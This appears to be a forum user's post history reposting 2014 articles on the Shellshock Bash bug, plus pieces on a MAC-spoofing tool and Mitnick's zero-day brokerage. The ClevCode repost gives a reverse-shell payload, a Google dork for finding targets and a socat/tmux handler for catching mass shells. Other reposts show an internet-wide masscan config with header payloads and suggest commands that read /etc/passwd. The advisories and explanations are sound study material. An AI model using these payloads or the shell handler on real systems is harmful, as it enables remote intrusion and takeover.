-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Nici nu o sa mearga vreodata. Ai citit macar un articol despre problema? Stii tu, acel "() {" ?
-
Aveti aici 6 articole detaliate despre aceasta problema: https://rstforums.com/forum/tutoriale-engleza.rst
-
Request HTTP cu User-Agent/Cookie/Referrer setat ca functie ce face ping/curl/wget de exemplu. Sau cat /etc/passwd. Sau afiseaza ceva, orice.
-
Kartoffel is a extensible command-line tool developed with the aim of helping developers to test the security and the reliability of a driver. Kartoffel exposes most of its features via the static library kartolib, thus you can build your own K-plugins to test exploits or PoCs, simulate I/O request or develop stand-alone programs. Sursa: Kartoffel - Secure Your Driver -
-
SpoofMAC - Spoof your MAC address For OS X, Windows, and Linux (most flavors) I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame. Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too! Installation You can install from PyPI using pip or easy_install: pip install SpoofMAC easy_install SpoofMAC or clone/download the repository and install with setup.py. Ex: git clone git://github.com/feross/SpoofMAC.git cd SpoofMAC python setup.py install If you're not using the system Python (because you use Homebrew, for example), make sure you add '/usr/local/share/python/' (or equivalent) to your path. Or, consider using spoof, a node.js port of this package. Sursa: https://github.com/feross/SpoofMAC
-
Kevin Mitnick, Once the World’s Most Wanted Hacker, Is Now Selling Zero-Day Exploits By Andy Greenberg 09.24.14 | 11:41 am | Permalink Mitnick showing a keylogging device to a crowd in 2010. Credit: Eneas De Troya | CC BY As a young man, Kevin Mitnick became the world’s most notorious black hat hacker, breaking into the networks of companies like IBM, Nokia, Motorola, and other targets. After a stint in prison, he reinvented himself as a white hat hacker, selling his skills as a penetration tester and security consultant. With his latest business venture, Mitnick has switched hats again: This time to an ambiguous shade of gray. Late last week, Mitnick revealed a new branch of his security consultancy business he calls Mitnick’s Absolute Zero Day Exploit Exchange. Since its quiet inception six months ago, he says the service has offered to sell corporate and government clients high-end “zero-day” exploits, hacking tools that take advantage of secret bugs in software for which no patch yet exists. Mitnick says he’s offering exploits developed both by his own in-house researchers and by outside hackers, guaranteed to be exclusive and priced at no less than $100,000 each, including his own fee. And what will his clients do with those exploits? “When we have a client that wants a zero-day vulnerability for whatever reason, we don’t ask, and in fact they wouldn’t tell us,” Mitnick tells WIRED in an interview. “Researchers find them, they sell them to us for X, we sell them to clients for Y and make the margin in between.” Mitnick declined to name any of his customers, and wouldn’t say how many, if any, exploits his exchange has brokered so far. But the website he launched to reveal the project last week offers to use his company’s “unique positioning among security researchers and the hacker community” to connect exploit developers with “discerning government and corporate buyers.” As the zero day market has come to light over the last several years, freelance hackers’ sale of potential surveillance tools to government agencies has become a hotly debated ethical quandary in the security community. The notion of Kevin Mitnick selling those tools could be particularly eyebrow-raising; After all, Mitnick became a symbol of government oppression in the late 1990s, when he spent four and a half years in prison and eight months in solitary confinement before his trial on hacking charges. The outcry generated a miniature industry in “Free Kevin” T-shirts and bumper stickers. Enabling targeted surveillance also clashes with Mitnick’s new image as a privacy advocate; His forthcoming book titled “The Art of Invisibility” promises to teach readers “cloaking and countermeasures” against “Big Brother and big data.” “It’s like an Amazon wish list of exploits.” He says his intended customers aren’t necessarily governments. Instead, he points to penetration testers and antivirus firms as potential exploit buyers, and even suggests that companies might pay him for vulnerabilities in their own products. “I’m not interested in helping government agencies spy on people,” he says. “I have a unique history with the government. These are the same people who locked me in solitary because they thought I could whistle nuclear launch codes.” Still, the six-figure fees Mitnick names on his site are far more than most buyers would pay for mere defensive purposes. (Though his website names a minimum price of $200,000, Mitnick says that’s an error, and that he’s willing to deal in exploits worth half that much.) Companies like Facebook and Paypal generally pay tens of thousands of dollars at most for information about bugs in their products, though Google occasionally pays as much as $150,000 in hacking contest prizes. Mitnick’s exploit exchange seems designed to cater particularly to high-end buyers. It lists two options: Absolute X, which lets clients pay for exclusive use of whatever hacking exploits Mitnick’s researchers dig up, and Absolute Z, a more premium service that seeks to find new zero-days that target whatever software the client chooses. “We have some clients that give us a menu of what they’re looking for, like ‘We’re looking for an exploit in this version of Chrome,’” he says. “It’s like an Amazon wish list of exploits.” Mitnick is far from the only hacker to see an opportunity in the growing grey market for zero days. Other firms like Vupen, Netragard, Exodus Intelligence, and Endgame Systems have all sold or brokered secret hacking techniques. While the trade is legal, critics have argued that the services’ lax customer policies make it possible for repressive regimes or even criminals to gain access to dangerous hacking tools. But Mitnick counters that he’ll carefully screen his buyers. “I would’t consider in a million years selling to a government like Syria or to a criminal organization,” he says. “Customers want to buy this information, and they’ll pay a certain price. If they pass our screening process, we’ll work with them.” As an ex-convict, Mitnick’s entrance into the zero-day market may mean he’ll face extra scrutiny himself. From his teens to his early 30s, after all, Mitnick went on an epic intrusion spree through the networks of practically every major tech firm of the day, including Digital Equipment, Sun Microsystems, Silicon Graphics, and many more. For two and a half years, he led the FBI on a manhunt that made him the most wanted hacker in the world at the time of his arrest in 1995. ACLU technologist Chris Soghoian, a vocal critic of the zero-day exploit business, used that criminal past to take a jab at Mitnick on Twitter following his announcement of the bug-selling brokerage. Mitnick shot back: “My clients may use them to monitor your activities? How do you like them apples, Chris?” Sursa: Kevin Mitnick, Once the World's Most Wanted Hacker, Is Now Selling Zero-Day Exploits | WIRED
-
Thursday, September 25, 2014 Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk. To set the scene, let me share some content from Robert Graham’s blog post who has been doing some excellent analysis on this. Imagine an HTTP request like this: target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet) http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 http-header = Host:() { :; }; ping -c 3 209.126.230.74 http-header = Referer:() { :; }; ping -c 3 209.126.230.74 Which, when issued against a range of vulnerable IP addresses, results in this: Put succinctly, Robert has just orchestrated a bunch of external machines to ping him simply by issuing a carefully crafted request over the web. What’s really worrying is that he has effectively caused these machines to issue an arbitrary command (albeit a rather benign ping) and that opens up a whole world of very serious possibilities. Let me explain. What is Bash and why do we need it? Skip this if it’s old news, but context is important for those unfamiliar with Bash so let’s establish a baseline understanding. Bash is a *nix shell or in other words, an interpreter that allows you to orchestrate commands on Unix and Linux systems, typically by connecting over SSH or Telnet. It can also operate as a parser for CGI scripts on a web server such as we’d typically see running on Apache. It’s been around since the late 80s where it evolved from earlier shell implementations (the name is derived from the Bourne shell) and is enormously popular. There are other shells out there for Unix variants, the thing about Bash though is that it’s the default shell for Linux and Mac OS X which are obviously extremely prevalent operating systems. That’s a major factor in why this risk is so significant – the ubiquity of Bash – and it’s being described as “one of the most installed utilities on any Linux system”. You can get a sense of the Bash footprint when you look at the latest Netcraft web server stats: When half the net is running Apache (which is typically found on Linux), that’s a significant size of a very, very large pie. That same Netcraft article is reporting that we’ve just passed the one billion websites mark too and whilst a heap of those are sharing the same hosts, that’s still a whole lot of Bash installations. Oh – that’s just web servers too, don’t forget there are a heap of other servers running Linux and we’ll come back to other devices with Bash a bit later too. Bash can be used for a whole range of typical administrative functions, everything from configuring websites through to controlling embedded software on a device like a webcam. Naturally this is not functionality that’s intended to be open to the world and in theory, we’re talking about authenticated users executing commands they’ve been authorised to run. In theory. What’s the bug? Let me start with the CVE from NIST vulnerability database because it gives a good sense of the severity (highlight mine): GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. They go on to rate it a “10 out of 10” for severity or in other words, as bad as it gets. This is compounded by the fact that it’s easy to execute the attack (access complexity is low) and perhaps most significantly, there is no authentication required when exploiting Bash via CGI scripts. The summary above is a little convoluted though so let’s boil it down to the mechanics of the bug. The risk centres around the ability to arbitrarily define environment variables within a Bash shell which specify a function definition. The trouble begins when Bash continues to process shell commands after the function definition resulting in what we’d classify as a “code injection attack”. Let’s look at Robert’s example again and we’ll just take this line: http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 The function definition is () { :; }; and the shell command is the ping statement and subsequent parameters. When this is processed within the context of a Bash shell, the arbitrary command is executed. In a web context, this would mean via a mechanism such as a CGI script and not necessarily as a request header either. It’s worth having a read through the seclists.org advisory where they go into more detail, including stating that the path and query string could be potential vectors for the attack. Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that’s going to be a seriously breaking change and at the very least, one that going to require some extensive testing to ensure it doesn’t cause immediate problems in the website which in many cases, it will. The HTTP proof above is a simple but effective one, albeit just one implementation over a common protocol. Once you start throwing in Telnet and SSH and apparently even DHCP, the scope increases dramatically so by no means are we just talking about exploiting web app servers here. (Apparently the risk is only present in SSH post-auth, but at such an early stage of the public disclosure we’ll inevitably see other attack vectors emerge yet.) What you also need to remember is that the scope of potential damage stretches well beyond pinging an arbitrary address as in Robert’s example, that’s simply a neat little proof that he could orchestrate a machine to issue a shell command. The question becomes this: What damage could an attacker do when they can execute a shell command of their choosing on any vulnerable machine? What are the potential ramifications? The potential is enormous – “getting shell” on a box has always been a major win for an attacker because of the control it offers them over the target environment. Access to internal data, reconfiguration of environments, publication of their own malicious code etc. It’s almost limitless and it’s also readily automatable. There are many, many examples of exploits out there already that could easily be fired off against a large volume of machines. Unfortunately when it comes to arbitrary code execution in a shell on up to half the websites on the internet, the potential is pretty broad. One of the obvious (and particularly nasty) ones is dumping internal files for public retrieval. Password files and configuration files with credentials are the obvious ones, but could conceivably extend to any other files on the system. Likewise, the same approach could be applied to write files to the system. This is potentially the easiest website defacement vector we’ve ever seen, not to mention a very easy way of distributing malware Or how about this: one word I keep seeing a lot is “worm”: When we talk about worm in a malicious computing context, we’re talking about a self-replicating attack where a malicious actor creates code that is able to propagate across targets. For example, we saw a very effective implementation of this with Samy’s MySpace XSS Worm where some carefully crafted JavaScript managed to “infect” a million victims’ pages in less than a day. The worry with Shellshock is that an attack of this nature could replicate at an alarming rate, particularly early on while the majority of machines remain at risk. In theory, this could take the form of an infected machine scanning for other targets and propagating the attack to them. This would be by no means limited to public facing machines either; get this behind the corporate firewall and the sky’s the limit. People are working on exploiting this right now. This is what makes these early days so interesting as the arms race between those scrambling to patch and those scrambling to attack heats up. Which versions of Bash are affected? The headlines state everything through 4.3 or in other words, about 25 years’ worth of Bash versions. Given everyone keeps comparing this to Heartbleed, consider that the impacted versions of OpenSSL spanned a mere two years which is a drop in the ocean compared to Shellshock. Yes people upgrade their versions, but no they don’t do it consistently and whichever way you cut it, the breadth of at-risk machines is going to be significantly higher with Shellshock than what it was with Heartbleed. But the risk may well extend beyond 4.3 as well. Already we’re seeing reports of patches not being entirely effective and given the speed with which they’re being rolled out, that’s not all that surprising. This is the sort of thing those impacted by it want to keep a very close eye on, not just “patch and forget”. When did we first learn of it and how long have we been at risk? The first mention I’ve found on the public airwaves was this very brief summary on seclists.org which works out at about 18:00 GMT on Wednesday (about 2am today for those of us on the eastern end of Australia). The detail came in the advisory I mentioned earlier an hour later so getting towards late afternoon Wednesday in Europe or the middle of the day in the US. It’s still very fresh news with all the usual press speculation and Chicken Little predications; it’s too early to observe any widespread exploitation in the wild, but that could also come very soon if the risk lives up to its potential. Scroll back beyond just what has been disclosed publicly and the bug was apparently discovered last week by Stéphane Chazelas, a “Unix/Linux, network and telecom specialist” bloke in the UK. Having said that, in Akamai’s post on the bug, they talk about it having been present for “an extended period of time” and of course vulnerable versions of Bash go back two and a half decades now. The question, as with Heartbleed, will be whether or not malicious actors were aware of this before now and indeed whether they were actively exploiting it. Are our “things” affected? This is where it gets interesting – we have a lot of “things” potentially running Bash. Of course when I use this term I’m referring to the “Internet of Things” (IoT) which is the increasing prevalence of whacking an IP address and a wireless adaptor into everything from our cutlery to our door locks to our light globes. Many IoT devices run embedded Linux distributions with Bash. These very same devices have already been shown to demonstrate serious security vulnerabilities in other areas, for example LIFX light globes just a couple of months ago were found to be leaking wifi credentials. Whilst not a Bash vulnerability like Shellshock, it shows us that by connecting our things we’re entering a whole new world of vulnerabilities in places that were never at risk before. This brings with it many new challenges; for example, who is actively thinking they should regularly patch their light bulbs? Also consider the longevity of the devices this software is appearing in and whether they’re actually actively maintained. In a case like the vulnerable Trendnet cameras from a couple of years ago, there are undoubtedly a huge number of them still sitting on the web because in terms of patching, they’re pretty much a “set and forget” proposition. In fact in that case there’s an entire Twitter account dedicated to broadcasting the images it has captured of unsuspecting owners of vulnerable versions. It’s a big problem with no easy fixes and its going to stick with us for a very long time. But Bash shells are also present in many more common devices, for example our home routers which are generally internet-facing. Remember when you last patched the firmware on your router? Ok, if you’re reading this then maybe you’re the type of technical person who actually does patch their router, but put yourself in the shoes of Average Joe Consumer and ask yourself that again. Exactly. All our things are on the Microsoft stack, are we at risk? Short answer “no”, long answer “yes”. I’ll tackle the easy one first – Bash is not found natively on Windows and whilst there are Bash implementations for Windows, it’s certainly not common and it’s not going to be found on consumer PCs. It’s also not clear if products like win-bash are actually vulnerable to Shellshock in the first place. The longer answer is that just because you operate in a predominantly Microsoft-centric environment doesn’t mean that you don’t have Bash running on machines servicing other discrete purposes within that environment. When I wrote about Heartbleed, I referenced Nick Craver’s post on moving Stack Overflow towards SSL and referred to this diagram of their infrastructure: There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers. These are also components that may have elevated privileges behind the firewall – what’s the impact if Shellshock is exploited on those? It could be significant and that’s the point I’m making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines. I’m a system admin – what can I do? Firstly, discovering if you’re at risk is trivial as it’s such an easily reproducible risk. There’s a very simple test The Register suggests which is just running this command within your shell: env X="() { :;} ; echo busted" /bin/sh -c "echo stuff" You get “busted” echo’d back out and you’ve successfully exploited the bug. Of course the priority here is going to be patching at risk systems and the patch essentially boils down to ensuring no code can be executed after the end of a Bash function. Linux distros such as Red Hat are releasing guidance on patching the risk so jump on that as a matter of priority. We’ll inevitably also see definitions for intrusion detection systems too and certainly there will be common patterns to look for here. That may well prove a good immediate term implementation for many organisations, particularly where there may be onerous testing requirements before rolling out patches to at-risk systems. Qualys’ are aiming to have a definition to detect the attack pretty quickly and inevitably other IDS providers are working on this around the clock as well. Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications. The other issue which will now start to come up a lot is the question of whether Shellshock has already been exploited in an environment. This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when short of full on pcaps, the heartbeat payloads would not normally have been logged anywhere. But still, the most common response to “were we attacked via Shellshock” is going to be this: unfortunately, this isn't "No, we have evidence that there were no compromises;" rather, "we don't have evidence that spans the lifetime of this vulnerability." We doubt many people do - and this leaves system owners in the uncomfortable position of not knowing what, if any, compromises might have happened. Let the speculation about whether the NSA was in on this begin… I’m a consumer – what can I do? It depends. Shellshock affects Macs so if you’re running OS X, at this stage that appears to be at risk which on the one hand is bad due to the prevalence of OS X but on the other hand will be easily (and hopefully quickly) remediated due to a pretty well-proven update mechanism (i.e. Apple can remotely push updates to the machine). If you’re on a Mac, the risk is easily tested for as described in this Stack Exchange answer: It’s an easy test, although I doubt the average Mac user is going to feel comfortable stepping through the suggested fix which involves recompiling Bash. The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either. In short, the advice to consumers is this: watch for security updates, particularly on OS X. Also keep an eye on any advice you may get from your ISP or other providers of devices you have that run embedded software. Do be cautious of emails requesting information or instructing you to run software – events like this are often followed by phishing attacks that capitalise on consumers’ fears. Hoaxes presently have people putting their iPhones in the microwave so don’t for a moment think that they won’t run a random piece of software sent to them via email as a “fix” for Shellshock! Summary In all likelihood, we haven’t even begun the fathom the breadth of this vulnerability. Of course there are a lot of comparisons being made to Heartbleed and there are a number of things we learned from that exercise. One is that it took a bit of time to sink in as we realised the extent to which we were dependent on OpenSSL. The other is that it had a very long tail – months after it hit there were still hundreds of thousands of known hosts left vulnerable. But in one way, the Heartbleed comparison isn’t fair – this is potentially far worse. Heartbleed allowed remote access to small amount of data in the memory of affected machines. Shellshock is enabling remote code injection of arbitrary commands pre-auth which is potentially far more dire. In that regard, I have to agree with Robert: It’s very, very early days yet – only half a day since it first hit the airwaves at the time of writing – and I suspect that so far we’re only scratching the surface of what is yet to come. Sursa: Troy Hunt: Everything you need to know about the Shellshock Bash bug
-
CVE-2014-6271 / Shellshock & How to handle all the shells! ;)
Nytro posted a topic in Securitate web
CVE-2014-6271 / Shellshock & How to handle all the shells! Posted by Joel Eriksson ? 2014-09-25 ? Leave a Comment For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that. CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feauture before, many years ago, since it could be abused in another way in cases where SUID-programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing. When a SUID-program is the target, the SUID-program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID-programs call out to shellscript helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up. In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability. je@tiny:~$ cat > bash-is-fun.c /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */ #include <unistd.h> #include <stdio.h> int main() { char *envp[] = { "PATH=/bin:/usr/bin", "/usr/bin/id=() { " "echo pwn me twice, shame on me; }; " "echo pwn me once, shame on you", NULL }; char *argv[] = { "/bin/bash", NULL }; execve(argv[0], argv, envp); perror("execve"); return 1; } ^D je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c je@tiny:~$ ./bash-is-fun pwn me once, shame on you je@tiny:/home/je$ /usr/bin/id pwn me twice, shame on me As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2?. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2? will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1? part is executed when trying to run id in a “secure” manner by providing the full path. One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string, is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them. The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable. Another way to find lots and lots of potentially vulnerable targets is to do a simple google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous. So, now to the part of handling all the shells. Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle with a ping -c N ADDR-payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot). Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job-control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest you to use a payload such as this (with ADDR and PORT replaced with your IP and port number, of course): () { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0' To try this out, just run this in one shell to start a listener: stty -echo raw; nc -l 12345; stty sane Then do this in another shell: bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0' To deal with all the shells coming your way I would suggest you to use some tmux+socat-magic I came up with when dealing with similar “problems” in the past. Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700): #!/bin/sh tmux has-session -t alltheshells 2>/dev/null \ || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info tmux send-keys -t alltheshells:info "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter mkdir /tmp/alltheshells 2>/dev/null tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \ "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read" socat unix-listen:/tmp/alltheshells/$$.sock - Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to): socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler When the shells start popping you can do: tmux attach -t alltheshells The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, download this: ########################### # Initialization ########################### # - Pastebin.com Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with. Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode -
[h=3]Bash 'shellshock' scan of the Internet[/h] By Robert Graham I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like: target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet) http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74 http-header[Host] = () { :; }; ping -c 3 209.126.230.74 http-header[Referer] = () { :; }; ping -c 3 209.126.230.74 (Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120) Some earlier shows that this bug is widespread: A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high. Sursa: Errata Security: Bash 'shellshock' scan of the Internet
-
We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day. Let's start with the nature of the bug. At its core, the problem caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this: $ function foo { echo "hi mom"; } $ export -f foo $ bash -c 'foo' # Spawn nested shell, call 'foo' hi mom The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here: $ foo='() { echo "hi mom"; }' bash -c 'foo' hi mom The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will be probably initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn. And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet. With that out of the way, it is important to note that the today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function def. But even with all the current patches applied, you can still do this: Cookie: () { echo "Hello world"; } ...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will be always prefixed with HTTP_*, so it's unlikely to clash with anything or be called by incident - but intuitively, it's a pretty scary outcome. In the same vein, doing this will also have an unexpected result: Cookie: () { oops If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log. All in all, the fix hinges on two risky assumptions: That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has been already proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern. If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment. What else? Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash! This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter. For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with. Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts. PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on. Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
-
Bash specially-crafted environment variables code injection attack Posted on 2014/09/24 by Huzaifa Sidhpurwala Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal based command interpreter to many other fancy uses. In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc) Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example: ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access. Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine. Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run. Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells. Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way as described above, but doing so should be considered a bad programming practice. Red Hat has issued security advisories that fixes this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fixes this issue. We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723 Information on CentOS can be found at [CentOS] Critical update for bash released today.. Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
-
